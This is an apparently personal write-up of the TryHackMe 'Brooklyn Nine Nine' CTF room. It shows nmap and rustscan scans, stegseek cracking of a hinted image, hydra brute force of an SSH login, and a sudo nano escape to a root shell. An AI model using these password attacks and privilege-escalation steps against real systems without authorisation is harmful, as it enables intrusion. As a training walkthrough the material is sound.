Brooklyn Nine Nine

Last updated 1 year ago

Brooklyn Nine Nine

Lab Setup

mkdir ~/Documents/TryHackMe/eJPT/Brooklyn99
cd ~/Documents/TryHackMe/eJPT/Brooklyn99
mkdir recon enumeration notes
touch/{README.md,vulns,creds}

export IP=10.10.106.147
export URL=http://$IP

Enumeration

First thing that I do when I make a machine I scan for open ports. I do this with nmap and rustscan.

rustscan

rustscan -a $IP --ulimit 5000 -- -sC -sV -v -oN recon/rustscan.init

nmap

nmap -Pn -p- -v -T4 --max-retries 5 $IP -oN recon/nmap.init;
cat recon/nmap.init | grep '/.*open'| cut -d '/' -f 1| tr '\n' ', '| sed 's/.$//g' > recon/ports;
sudo nmap -Pn -sS -sV -n -v -A -T4 -p $(cat recon/ports) $IP -oN recon/nmap.alltcp

Look for default page on website. In source code I found an interesting commentary.

<!-- Have you ever heard of steganography? -->

So let’s download the image and use some stegano tools.

stegseek --crack brooklyn99.jpg ~/Documents/rockyou.txt

admin --> password

Keep in mind that the path I used for rockyou database might differ from your path

When I see the 80 port open I usually scan for files and directories, but I didn’t find anything. So let’s connect to FTP server with anonymous default user.

Jake has a weak password so let’s brute force ssh login.

hydra -l jake -P ~/Documents/rockyou.txt ssh://$IP

Now I have 2 users and for each of them one password to connect with ssh.

Exploitation

Connect with ssh and see the user flag in holt home directory.

sudo nano
^R^X
reset; sh 1>&0 2>&0

PreviousKoTH Hackers NextChill Hack

Last updated 1 year ago